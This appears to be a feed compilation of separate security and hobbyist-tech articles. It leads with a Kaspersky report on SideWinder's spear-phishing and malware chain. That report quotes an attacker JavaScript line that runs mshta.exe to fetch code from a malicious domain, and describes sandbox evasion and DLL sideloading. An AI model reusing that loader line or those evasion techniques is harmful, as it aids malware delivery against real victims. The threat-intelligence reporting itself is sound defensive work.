SideWinder targets the maritime and nuclear sectors with an updated toolset
Last year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been military and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had mostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively extending its activities beyond their typical targets, infecting government entities, logistics companies and maritime infrastructures in South and Southeast Asia, the Middle East, and Africa. We also shared further information about SideWinder’s post-exploitation activities and described a new sophisticated implant designed specifically for espionage.
We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but we noticed a new and significant increase in attacks against maritime infrastructures and logistics companies.
In 2024, we initially observed a significant number of attacks in Djibouti. Subsequently, the attackers shifted their focus to other entities in Asia and showed a strong interest in targets within Egypt.
Moreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia and further expansion of activities into new countries, especially in Africa.
Countries and territories targeted by SideWinder in the maritime and logistics sectors in 2024
It is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our observation of the group’s activities, we presume they are constantly monitoring detections of their toolset by security solutions. Once their tools are identified, they respond by generating a new and modified version of the malware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used to maintain persistence and load components. Additionally, they change the names and paths of their malicious files. Thus, monitoring and detection of the group’s activities reminds us of a ping-pong game.
Infection vectors
The infection pattern observed in the second part of 2024 is consistent with the one described in the previous article.
Infection flow
The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker. The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.
The documents used various themes to deceive victims into believing they are legitimate.
Some documents concerned nuclear power plants and nuclear energy agencies.
Malicious documents related to nuclear power plants and energy
Many others concerned maritime infrastructures and various port authorities.
Malicious documents relating to maritime infrastructures and different port authorities
In general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most of the attacks were aimed at various national ministries and diplomatic entities.
We also detected various documents that covered generic topics. For example, we found a document with information on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document offering a freelance video game developer a job working on a 3D action-adventure game called “Galactic Odyssey”.
Examples of generic malicious documents
RTF exploit
The exploit file contained a shellcode, which had been updated by the attacker since our previous research, but the main goal remained the same: to run embedded JavaScript code invoking the
mshtml.RunHTMLApplication function.
In the new version, the embedded JavaScript runs the Windows utility
mshta.exe and obtains additional code from a remote server:javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe
dgtk.depo-govpk[.]com/19263687…);window.close();")
The newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although they differ slightly from those in past versions.
- It uses the GlobalMemoryStatusEx function to determine the size of RAM.
- It attempts to load the nlssorting.dll library and terminates execution if operation succeeds.
JavaScript loader
The RTF exploit led to the execution of the
mshta.exe Windows utility, abused to download a malicious HTA from a remote server controlled by the attacker.mshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui
The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader Module”, into memory.
The JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially encoded with a substitution algorithm and stored as variables. It then checks the installed RAM and terminates if the total size is less than 950 MB. Otherwise, the previously decoded strings are used to load the second stage.
The second stage is another JavaScript file. It enumerates the subfolders at Windows%\Microsoft.NET\Framework\ to find the version of the .NET framework installed on the system and uses the resulting value to configure the environment variable
COMPLUS_Version.
Finally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a base64-encoded .NET serialized stream.
Downloader Module
This component is a .NET library used to collect information about the installed security solution and download another component, the “Module Installer”. These components were already described in the previous article and will not be detailed again here.
In our latest investigation, we discovered a new version of the
app.dll Downloader Module, which includes a more sophisticated function for identifying installed security solutions.
In the previous version, the malware used a simple WMI query to obtain a list of installed products. The new version uses a different WMI, which collects the name of the antivirus and the related “productState”.
Furthermore, the malware compares all running process names against an embedded dictionary. The dictionary contains 137 unique process names associated with popular security solutions.
The WMI query is executed only when no Kaspersky processes are running on the system.
Backdoor Loader
The infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library consistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot” implant into memory. Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior article, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has remained unchanged.
In the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For correct execution, it had to be stored on victims’ systems under one of the following names:
propsys.dll
vsstrace.dll
During the most recent campaign, the attackers tried to diversify the samples, generating many other variants distributed under the following names:
JetCfg.dll
policymanager.dll
winmm.dll
xmllite.dll
dcntel.dll
UxTheme.dll
The new malware variants feature an enhanced version of anti-analysis code and employ Control Flow Flattening more extensively to evade detection.
During the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic is the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks anti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were configured to load the second stage from a specific file path embedded in the code, which also included the user’s name. Example:
C:\Users\[REDACTED]\AppData\Roaming\valgrind\[REDACTED FILE NAME].[REDACTED EXTENSION]
It indicates that these variants were likely used after the infection phase and manually deployed by the attacker within the already compromised infrastructure, after validating the victim.
Victims
SideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. The targeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of attacks against the maritime and the logistics sectors has increased and expanded to Southeast Asia.
Furthermore, we observed attacks against entities associated with nuclear energy. The following industries were also affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels.
Countries and territories targeted by SideWinder in 2024
Overall, the group has further extended its activities, especially in Africa. We detected attacks in Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, the United Arab Emirates, and Vietnam.
In this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda.
Conclusion
SideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic infection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again emphasizes the critical importance of installing security patches.
Despite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know the group’s software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore, we know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot” described in our previous article. These capabilities make them a highly advanced and dangerous adversary.
To protect against such attacks, we strongly recommend maintaining a patch management process to apply security fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed) and using a comprehensive security solution that provides incident detection and response, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any complexity at an early stage. The campaign described in this article relies on spear-phishing emails as the initial attack vector, which highlights the importance of regular employee training and awareness programs for corporate security.
We will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective detection of malware.
***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.
Indicators of compromise
Microsoft Office Documents
e9726519487ba9e4e5589a8a5ec2f933
d36a67468d01c4cb789cd6794fb8bc70
313f9bbe6dac3edc09fe9ac081950673
bd8043127abe3f5cfa61bd2174f54c60
e0bce049c71bc81afe172cd30be4d2b7
872c2ddf6467b1220ee83dca0e118214
3d9961991e7ae6ad2bae09c475a1bce8
a694ccdb82b061c26c35f612d68ed1c2
f42ba43f7328cbc9ce85b2482809ff1c
Backdoor Loader
0216ffc6fb679bdf4ea6ee7051213c1e
433480f7d8642076a8b3793948da5efe
Domains and IPs
pmd-office[.]info
modpak[.]info
dirctt888[.]info
modpak-info[.]services
pmd-offc[.]info
dowmloade[.]org
dirctt888[.]com
portdedjibouti[.]live
mods[.]email
dowmload[.]co
downl0ad[.]org
d0wnlaod[.]com
d0wnlaod[.]org
dirctt88[.]info
directt88[.]com
file-dwnld[.]org
defencearmy[.]pro
document-viewer[.]info
aliyum[.]email
d0cumentview[.]info
debcon[.]live
document-viewer[.]live
documentviewer[.]info
ms-office[.]app
ms-office[.]pro
pncert[.]info
session-out[.]com
zeltech[.]live
ziptec[.]info
depo-govpk[.]com
crontec[.]site
mteron[.]info
mevron[.]tech
veorey[.]live
mod-kh[.]info
securelist.com/sidewinder-apt-…
ZX Spectrum, Soviet Style: A 44-IC Clone You Can Build
If you’ve ever fancied building a ZX Spectrum clone without hunting down ancient ULAs or soldering your way through 60+ chips, [Alex J. Lowry] has just dropped an exciting build. He has recreated the Leningrad-1, a Soviet-built Spectrum clone from 1988, with a refreshingly low component count: 44 off-the-shelf ICs, as he wrote us. That’s less than many modern clones like the Superfo Harlequin, yet without resorting to programmable logic. All schematics, Gerbers, and KiCad files are open-source, listed at the bottom of [Alex]’ build log.
The original Leningrad-1 was designed by Sergey Zonov during the late Soviet era, when cloning Western tech was less about piracy and more about survival. Zonov’s design nailed a sweet spot between affordability and usability, with enough compatibility to run 90-95% of Spectrum software. [Alex]’ replica preserves that spirit, with a few 21st-century tweaks for builders: silkscreened component values, clever PCB stacking with nylon standoffs, and a DIY-friendly mechanical keyboard hack using transparent keycaps.
While Revision 0 still has some quirks – no SCART color output yet, occasional flickering borders with AY sound – [Alex] is planning for further improvements. Inspired to build your own? Read [Alex]’ full project log here.
Due mesi alla RHC Conference 2025! Grazie ai nostri Sponsor per aver reso questo evento possibile!
Mancano solo due mesi alla quarta edizione della Red Hot Cyber Conference 2025, l’evento annuale gratuito organizzato dalla community di Red Hot Cyber. La conferenza si terrà a Roma, come lo scorso anno presso il Teatro Italia in Via Bari 18, nelle giornate di giovedì 8 e venerdì 9 maggio 2025.
Questo appuntamento è diventato un punto di riferimento nel panorama italiano della sicurezza informatica, dell’intelligenza artificiale e dell’innovazione tecnologica, con l’obiettivo di sensibilizzare il pubblico sui rischi del digitale e promuovere la cultura della cybersecurity, soprattutto tra i più giovani.
La community di Red Hot Cyber, fondata nel 2019 da Massimiliano Brolli, si dedica alla diffusione di informazioni, notizie e ricerche su temi legati alla sicurezza informatica, all’intelligence e all’Information Technology. Con la convinzione che la condivisione della conoscenza e la collaborazione siano fondamentali per affrontare le sfide del cyberspazio, RHC si impegna attivamente nella promozione di una cultura della sicurezza, incoraggiando il pensiero critico e stimolando l’interesse per le discipline informatiche tra i giovani.
- Programma della Red Hot Cyber Conference 2025
- Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
- Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
- Regolamento per la Capture The Flag (CTF)
Una Prima Giornata Dedicata Esclusivamente Ai Giovani
Come ogni anno, la prima giornata della conferenza sarà interamente dedicata ai giovani, in particolare agli studenti delle scuole medie e superiori, per avvicinarli al mondo dell’information technology e della sicurezza informatica. A differenza degli scorsi anni, i Workshop saranno accessibili solo alla giornata di Giovedì 8 maggio.
I workshop hands-on – anche questo anno organizzati con il supporto di Accenture – saranno il cuore pulsante della giornata: prima spiegheremo ai ragazzi come si fa qualcosa, poi gli daremo la possibilità di rifarlo direttamente loro stessi sui loro laptop. Questo approccio pratico e interattivo è pensato per stimolare l’interesse verso il mondo della tecnologia e della cybersecurity e fornire un’opportunità unica di toccare con mano la tecnologia.
Invitiamo i ragazzi delle scuole medie, superiori ed Università a registrarsi alla conferenza, affinché possano vivere un’esperienza formativa concreta e immersiva.
Ma la prima giornata non sarà solo formazione: anche quest’anno si terrà la Capture The Flag (CTF), una competizione per hacker etici provenienti da tutta Italia. I partecipanti si sfideranno in una serie di prove pratiche di cybersecurity, hacking etico e problem-solving, accumulando punteggi per scalare la classifica e vincere la challenge.
Una CTF è una competizione di cybersecurity in cui i partecipanti devono risolvere sfide di sicurezza informatica per trovare e “catturare” delle flag, ovvero dei codici nascosti all’interno di vari scenari digitali. La CTF di RHC si svolgerà in un ambiente sicuro e controllato, offrendo a giovani hacker l’opportunità di mettere alla prova le proprie capacità, imparare nuove tecniche e confrontarsi con altri appassionati del settore.
- Programma della Red Hot Cyber Conference 2025
- Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
- Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
- Regolamento per la Capture The Flag (CTF)
Una Seconda Giornata All’Insegna Della Conferenza
Se la prima giornata sarà focalizzata sui giovani e sulla formazione pratica, la seconda giornata della Red Hot Cyber Conference 2025 sarà dedicata esclusivamente alla conferenza, con una serie di speech di alto livello interamente in lingua italiana.
Esperti di sicurezza informatica, information technology e innovazione digitale si alterneranno sul palco con interventi di eccezione, affrontando temi come l’hacking, l’intelligenza artificiale applicata alla cybersecurity, la sicurezza del cloud e delle infrastrutture critiche, le guerre informatiche, la geopolitica e le strategie di difesa digitale, oltre all’evoluzione del crimine informatico.
La giornata si aprirà con un panel istituzionale di alto livello, in cui esperti giuridici, rappresentanti delle istituzioni e professionisti del settore discuteranno di strategie e normative per la protezione digitale del Paese. Il tema del panel sarà “IL FUTURO DELLA CYBERSICUREZZA IN ITALIA – STRATEGIE PER LA PROSSIMA ERA DIGITALE”, un dibattito cruciale su come l’Italia si sta preparando ad affrontare le nuove minacce cyber, con un focus su regolamentazione, prevenzione e strategie nazionali per rafforzare la sicurezza digitale.
La Red Hot Cyber Conference 2025 sarà un’occasione unica per confrontarsi con i maggiori esperti del settore, approfondire i temi più attuali della sicurezza informatica e comprendere come il nostro Paese può affrontare le sfide digitali del futuro.
- Programma della Red Hot Cyber Conference 2025
- Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
- Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
- Regolamento per la Capture The Flag (CTF)
Tutto Questo grazie Ai Nostri Sponsor
La realizzazione di questo evento non sarebbe possibile senza il prezioso supporto dei nostri sponsor. La loro collaborazione è fondamentale per offrire un’esperienza formativa e coinvolgente a tutti i partecipanti.
- Sponsor Sostenitori Workshop
- Sponsor Sostenitori
- Sponsor Platinum
- Sponsor Gold
- Sponsor Silver
Inoltre ringraziamo tutti i nostri media Partner che sono i Fintech Awards, i Cyber Actors, Women 4 Cyber, Digital Security Summit, GDPR Day, E-Campus Università, Hackmageddon, CyberSecurityUP, Federazione Italiana Combattenti, Ri-Creazione, Aipsi e RedHotCyber Academy.
Invitiamo tutte le aziende interessate a sostenere la Red Hot Cyber Conference 2025 a contattarci per informazioni sui pacchetti di sponsorizzazione ancora disponibili. La vostra partecipazione contribuirà a promuovere la cultura della sicurezza informatica e a formare i professionisti del futuro.
- Programma della Red Hot Cyber Conference 2025
- Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
- Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
- Regolamento per la Capture The Flag (CTF)
Non perdete l’opportunità di essere parte di questo importante appuntamento nel mondo della cybersecurity!
L'articolo Due mesi alla RHC Conference 2025! Grazie ai nostri Sponsor per aver reso questo evento possibile! proviene da il blog della sicurezza informatica.
Siti Italiani Presi di Mira! Il Deface di !FAKESITE e il Lato Oscuro dell’Hacktivismo
Negli ultimi giorni, diversi siti web italiani sono stati presi di mira da un attacco di defacement, una tecnica utilizzata per modificare il contenuto di una pagina web senza il consenso del proprietario. Tra i siti colpiti figurano:
- hxxps://viralproduction[.]it/1337.php
- hxxps://diegolucattini[.]it/1337.php
Questi attacchi sono stati rivendicati dal gruppo denominato !FAKESITE, che ha lasciato la propria firma sulle pagine defacciate, accompagnata da un messaggio provocatorio e un elenco di pseudonimi di presunti membri del collettivo. Di seguito quanto gli hacktivisti hanno riportato all’interno dei siti:
FIRMATO DA FAKESITE | SISTEMA DI ERRORE INFORMATICO
"Se mi chiedi delle vulnerabilità di un sistema, non ho una risposta. Ma ciò che è certo è che la sicurezza più vulnerabile è quella degli esseri umani stessi"
CONTATTAMI CLICCA QUI
Fakesite - Doys_404 - Anon_lx02 - Fakesec - Iethesia - SukaKamu01 - HanjsXploite - Enter666x - NoFace999 - Lanzz/GregCyber - XybaXploite - RommyXploit - Dandier - Xstroven - BigBoy - Amirxploite - Machfood - Fedup_404 - UniCorn - Izunasec
[ Cyber Error System | Jawa Barat Cyber | TegalXploiter ]
[ Bogor6etar | Hacktivist Of Garuda ] 
Cos’è un Deface?
Il defacing è una forma di hacking che consiste nell’alterare il contenuto di un sito web, sostituendo la homepage o aggiungendo elementi non autorizzati. Questo tipo di attacco può essere realizzato sfruttando vulnerabilità nei server web, nei CMS (Content Management System) o tramite credenziali compromesse.
I deface vengono spesso utilizzati per diversi scopi:
- Dimostrazione di vulnerabilità: per evidenziare falle nella sicurezza di un sistema.
- Messaggi politici o sociali: in casi di hacktivismo, gli attaccanti veicolano messaggi di protesta.
- Propaganda: alcuni gruppi utilizzano il defacing per diffondere ideologie o per fare pubblicità a determinate cause.
- Semplice vandalismo: in alcuni casi, gli attacchi avvengono senza uno scopo preciso, ma solo per il gusto di danneggiare.
Hacktivismo: Quando l’Hacking Diventa Protesta
L’hacktivismo è una forma di attivismo che sfrutta le tecniche informatiche per promuovere una causa politica o sociale. I gruppi hacktivisti spesso attaccano siti governativi, istituzionali o aziendali per sensibilizzare l’opinione pubblica su determinate problematiche. Alcuni dei gruppi più noti in questo campo sono Anonymous, Lizard Squad e LulzSec.
Nel caso del gruppo !FAKESITE il messaggio lasciato sui siti attaccati suggerisce un intento più legato al cyber-vandalismo o alla dimostrazione di competenze, piuttosto che a una vera e propria causa politica. Tuttavia, la presenza di riferimenti a una “Cyber Error System” e a collettivi come “Hacktivist Of Garuda” potrebbe suggerire un legame con movimenti più ampi della scena underground del hacking.
Implicazioni e Sicurezza
Attacchi di questo tipo evidenziano l’importanza di adottare misure di sicurezza adeguate per proteggere i siti web da intrusioni non autorizzate. Alcuni accorgimenti fondamentali includono:
- Aggiornare regolarmente software e plugin.
- Utilizzare password complesse e autenticazione a due fattori.
- Monitorare i log di accesso per individuare attività sospette.
- Implementare firewall e sistemi di rilevamento delle intrusioni.
Il defacing, sebbene possa sembrare un’azione innocua rispetto ad altri attacchi informatici più devastanti come il ransomware, può comunque causare danni reputazionali e finanziari significativi alle vittime.
Resta da vedere se il gruppo !FAKESITE continuerà con questo tipo di attacchi o se il loro operato si limiterà a questi episodi isolati. Nel frattempo, è essenziale che i gestori di siti web rafforzino le proprie difese per evitare di cadere vittime di simili incursioni.
Questo articolo è stato redatto attraverso l’utilizzo della piattaforma Recorded Future, partner strategico di Red Hot Cyber e leader nell’intelligence sulle minacce informatiche, che fornisce analisi avanzate per identificare e contrastare le attività malevole nel cyberspazio.
L'articolo Siti Italiani Presi di Mira! Il Deface di !FAKESITE e il Lato Oscuro dell’Hacktivismo proviene da il blog della sicurezza informatica.
Black Basta e Cactus: nuove tattiche con il malware BackConnect
Negli ultimi mesi, i gruppi ransomware Black Basta e Cactus hanno ampliato le loro tattiche d’attacco integrando il malware BackConnect nel loro arsenale. Questa evoluzione rappresenta una minaccia significativa per le organizzazioni a livello globale, combinando tecniche sofisticate per ottenere e mantenere l’accesso non autorizzato ai sistemi compromessi.
L’evoluzione delle tattiche di attacco
Secondo un’analisi pubblicata da Trend Micro, Black Basta e Cactus utilizzano nuove strategie per compromettere i sistemi aziendali. L’adozione del malware BackConnect consente agli attaccanti di stabilire connessioni persistenti sui sistemi infetti, facilitando operazioni di esfiltrazione dati e ulteriori attacchi.
Tecniche di ingegneria sociale per l’accesso iniziale
Gli aggressori fanno largo uso di tecniche di ingegneria sociale per ottenere l’accesso iniziale ai sistemi target. Una delle strategie più diffuse è l’invio massiccio di email, un vero e proprio bombardamento di messaggi che ha lo scopo di confondere le vittime e indurle ad aprire allegati malevoli o a cliccare su link dannosi. Oltre a questo, viene spesso adottata la tecnica dell’impersonificazione del supporto IT, attraverso la quale gli attaccanti si fingono tecnici aziendali per ottenere credenziali di accesso.
Un altro aspetto preoccupante riguarda lo sfruttamento di strumenti di collaborazione e assistenza remota come Microsoft Teams e Quick Assist. Questi strumenti, essenziali per il lavoro e il supporto tecnico, vengono utilizzati dagli attaccanti per espandere la loro presenza all’interno delle reti aziendali, aggirando così molte delle difese tradizionali.
DLL Side-Loading tramite OneDriveStandaloneUpdater.exe
Una delle tecniche più insidiose adottate dagli attaccanti è l’abuso del processo OneDriveStandaloneUpdater.exe per il caricamento laterale di DLL malevole, noto come DLL side-loading. Questa metodologia sfrutta il modo in cui Windows carica le librerie DLL, sostituendo una versione legittima con una dannosa. In questo modo, gli aggressori riescono a eseguire codice malevolo con privilegi elevati, garantendosi un accesso persistente ai sistemi compromessi. Il processo inizia con il posizionamento di una versione malevola della DLL nella stessa directory di esecuzione del file legittimo, forzandone così il caricamento automatico.
Distribuzione del malware BackConnect
Dopo aver ottenuto l’accesso alla rete target, gli attaccanti procedono con la distribuzione del malware BackConnect. Questo strumento consente di stabilire connessioni remote persistenti, fornendo agli aggressori un canale sicuro attraverso cui controllare il sistema infetto. Grazie a questa tecnica, riescono a evitare molte soluzioni di rilevamento basate sulle firme tradizionali e, allo stesso tempo, possono distribuire ulteriori payload malevoli, aumentando il livello di compromissione.
Utilizzo di servizi cloud per la distribuzione di malware
Per eludere le misure di sicurezza e rendere più difficile l’identificazione dei file dannosi, gli attaccanti sfruttano servizi di cloud storage commerciali. Ospitando malware su piattaforme legittime, riescono a diffonderlo senza destare sospetti, aggirando molte delle protezioni perimetrali che filtrano il traffico web. L’uso dei servizi cloud permette inoltre agli attaccanti di aggiornare dinamicamente i file malevoli, evitando così che vengano rapidamente individuati e rimossi dalle soluzioni di sicurezza.
Target e impatto globale
Dall’ottobre 2024, la maggior parte degli attacchi condotti attraverso queste tecniche si è verificata in Nord America ed Europa, con gli Stati Uniti tra i paesi più colpiti. Gli obiettivi principali sono stati le aziende del settore manifatturiero, seguite da quelle operanti nel settore finanziario e immobiliare. Questo tipo di attacchi dimostra una chiara strategia da parte degli aggressori, che tendono a prendere di mira settori particolarmente sensibili alla perdita di dati e alla compromissione delle operazioni.
L’integrazione di BackConnect nelle operazioni di Black Basta e Cactus segna un’evoluzione significativa delle minacce ransomware. L’uso combinato di ingegneria sociale, abuso di strumenti legittimi, DLL side-loading e servizi cloud rappresenta una sfida complessa per le aziende, che devono adottare contromisure adeguate. Implementare soluzioni avanzate di rilevamento basate sul comportamento degli utenti e sulle anomalie di rete diventa fondamentale per contrastare queste minacce. Inoltre, è essenziale investire nella formazione del personale, in modo da ridurre il rischio di cadere vittima di tecniche di social engineering. Monitorare attentamente l’uso degli strumenti di collaborazione e assistenza remota, adottando politiche di sicurezza basate sul principio del minimo privilegio, può contribuire a ridurre l’esposizione a questi attacchi.
Con l’evoluzione continua delle minacce ransomware, la consapevolezza e l’adozione di strategie di difesa avanzate rappresentano le migliori risorse per proteggere le infrastrutture aziendali da attacchi sempre più sofisticati.
L'articolo Black Basta e Cactus: nuove tattiche con il malware BackConnect proviene da il blog della sicurezza informatica.
IPV4, IPV6… Hey! What Happened to IPV5?
If you’ve ever been configuring a router or other network device and noticed that you can set up IPv4 and IPv6, you might have wondered what happened to IPv5. Well, thanks to [Navek], you don’t have to wonder anymore. Just watch the video below.
We will warn you of two things. First, the video takes a long time to get around to what IPv5 was. In addition, if you keep reading, there will be spoilers.
The first part of the video covers the general differences between IPv4 and IPv6, especially surrounding addressing. Then, it talks about how IP alone can’t do things you like to do for handling things like voice. For example, the IP layer doesn’t understand how much bandwidth exists between two points. It is only concerned with moving data from one point to another point.
To foster voice communications, there was a proposal for something called the stream protocol. It didn’t catch on. In fact, it was reincarnated as a proposal to move video, too, but it still didn’t catch on. However, the network header used the next number in sequence, which was… five!
So, really, the video title is a bit of a red herring. You didn’t forget IPv5; there simply was never an IPv5. There is, however, network protocol #5, which has little to do with IP and never caught on.
Still, an interesting walk down memory lane to a time when moving voice and video over the network was exotic high-tech. We love diving into the old network stuff like finger and UUCP.
youtube.com/embed/y-zeYSQdpCE?…
Clock Mechanism Goes Crazy for Arduino
You’ve doubtless seen those ubiquitous clock modules, especially when setting clocks for daylight savings time. You know the ones: a single AA battery, a wheel to set the time, and two or three hands to show the time. They are cheap and work well enough. But [Playful Technology] wanted to control the hands with an Arduino directly and, in the process, he shows us how these modules work.
If you’ve never studied the inside of these clock modules, you may be surprised about how they actually work. A crystal oscillator pulses a relatively large electromagnet. A small plastic gear has a magnetic ring and sits near the electromagnet.
Each time the polarity of the electromagnet flips, the ring turns 180 degrees to face the opposite magnetic pole to the electromagnet. This turns the attached gear which is meshed with other gears to divide the rotation rate down to once per 24 hours, once per hour, and once per minute. Pretty clever.
That makes it easy to control the hands. You simply detach the electromagnet from the rest of the circuit and control it yourself. The module he used had a mechanical limitation that prevents the hands from moving well at more than about 100 times normal speed.
We wondered how he made the hands reverse and, apparently, there is a way to get the drive gear to move in reverse, but it isn’t always reliable. Of course, you could also replace the drive mechanism with something like an RC servo or other motor and it sounds like he has done this and plans to show it off in another video.
We’ve seen the opposite trick before, too. If you really want an easy-to-control analog clock, try this one
youtube.com/embed/v142dbmIYq0?…
Hackaday Links: March 9, 2025
It’s been a busy week in space news, and very little of it was good. We’ll start with the one winner of the week, Firefly’s Blue Ghost Mission 1, which landed successfully on the Moon’s surface on March 2. The lander is part of NASA’s Commercial Lunar Payload Services program and carries ten scientific payloads, including a GPS/GNSS receiver that successfully tracked signals from Earth-orbiting satellites. All of the scientific payloads have completed their missions, which is good because the lander isn’t designed to withstand the long, cold lunar night only a few days away. The landing makes Firefly the first commercial outfit to successfully soft-land something on the Moon, and being the first at anything is always a big deal.
Slightly less impressive was Intuitive Machines’ attempt at a landing a day later. Their NOVA-C robotic lander Athena managed a somewhat controlled landing, but the spacecraft is lying on its side rather than upright, a surprisingly common failure mode for recent lunar landings. Also in the failure category is the loss of the world’s first private asteroid mining mission, as well as SpaceX Starship test flight 8, which ended in spectacular fashion this week as Starship exploded soon after booster separation. As usual, Scott Manley has the best analysis of the incident, which seemed to involve a fire in the engine bay that led to a rapid loss of thrust from four of its six engines, and sent the spacecraft tumbling before tearing itself apart. The only good news from the flight was the third successful catch of the returning booster by the chopsticks, which just never gets old.
What does get old is stories about printer manufacturers and their anti-consumer hijinks, especially when it involves one of the only manufacturers who wasn’t playing the “buy our consumables or we brick it” game. In addition to just about every other printer maker, Brother now stands accused of sending firmware up to printers that turns off functionality if non-OEM cartridges are used. The accusations come from Louis Rossman, well-known for his right-to-repair advocacy and, ironically, long-time proponent of Brother printers as least likely to be bricked. His accusation that “Brother is now among the rest of them” is based on a pretty small sample of affected users, and a self-selected one at that, so take that with the requisite amount of salt. For their part, Brother denies the claim, stating simply that “Brother firmware updates do not block the use of third-party ink in our machines.” They don’t go much beyond that by way of an explanation of what’s happening to the users reporting problems other than to say that the users may be confused by the fact that “we like to troubleshoot with Brother Genuine supplies.” What the real story is is anyone’s guess at this point, and the best advice we can offer is either to avoid printers altogether, or just buy the cheapest one you can get and harvest it for parts once the starter cartridges are empty.
If like us you’ve accumulated a large collection of physical media films and TV shows to while away the long dark days of a post-apocalyptic nightmare where Netflix and Hulu are but a distant memory, you might want to rethink your strategy. Some DVD aficionados have found a troubling trend with “DVD rot,” especially with discs manufactured by Warner Brothers Discovery between 2006 and 2008. It’s not clear what’s going on, but it looks like the polycarbonate cover is delaminating from the inner Mylar layer, resulting in cloudy areas that obscure the data. Warner is aware of the problem and will replace defective discs with the same title if possible, or exchange it for a title of like value if the original is no longer available. We’re dismayed that this defect probably includes our beloved Looney Tunes collection, but on the upside, now we have an excuse to sit through forty straight hours of cartoons.
And finally, if you were a NASA rocket engineer in the 1960s, skipping leg day wasn’t an option. That’s because the Saturn V full-stack shake test on the Apollo program was a very hands-on feet-on process. The shake test was performed to make sure nothing was loose on the stack, and that it would be able to withstand not only the shaking induced by those five massive F-1 engines, but also the occasional hurricane that Florida is famous for. To get the rocket shaking, engineers sat on the deck of the gantry with their legs bridging the gap and their feet up against the side of the service module and gave it all they had. Other engineers literally backed them up, to provide something to push against, while another team on the uppermost platform used a rope to play tug-of-war with the command module. They were able to get the stack moving pretty good, with a meter or so of deflection at the escape tower. It does raise the question, though: what would they have done if the test failed?
youtube.com/embed/s0UYNoTPdNs?…
Deep Drawing with Ultrasonics
Small cylindrical parts are often formed through deep drawing — a process by which a punch forms the finished piece from a flat sheet of metal using a forming die. If it sounds like that stresses the metal, it does. But researchers at Fraunhofer have found a way to reduce friction protecting both the material and the tools that do the forming. The process — known as VibroDraw — uses ultrasonic vibrations at around 500 Hz.
Researchers claim a 20% reduction in friction now, and it may be possible to go even further. With less friction, it is possible to do a deeper draw in a single stage. It also creates less heat which is good for tool life and prevents overheating lubricant. The process has a patent if you want more details. You might need to brush up on your German, though. Unsurprisingly, the vibrations are from a piezoelectric transducer.
Copper is soft enough to use 3D printed dies. We don’t know if this technique would help with that or not. Then there’s hydroforming. If you have any results using ultrasonics with these or any other techniques, be sure to let us know.
Old Chromebooks Get Second Life as Video Wall
What would you do with dozens and dozens of outdated Chromebooks that are no longer getting updates from the Google Mothership? It’s a situation that plenty of schools will have to deal with in the near future, and we can only help that those institutions have students as clever as [Varun Biniwale] and his friend [Aksel Salmi] to lean on — as they managed to recycle ten of these outdated laptops into an impressive video display.
There’s actually two write-ups for this particular story, with [Varun] documenting the modification of the Chromebooks and the software developed to play the video between them, and [Aksel] covering how the hardware was ultimately attached to the wall via bespoke 3D printed mounting brackets.
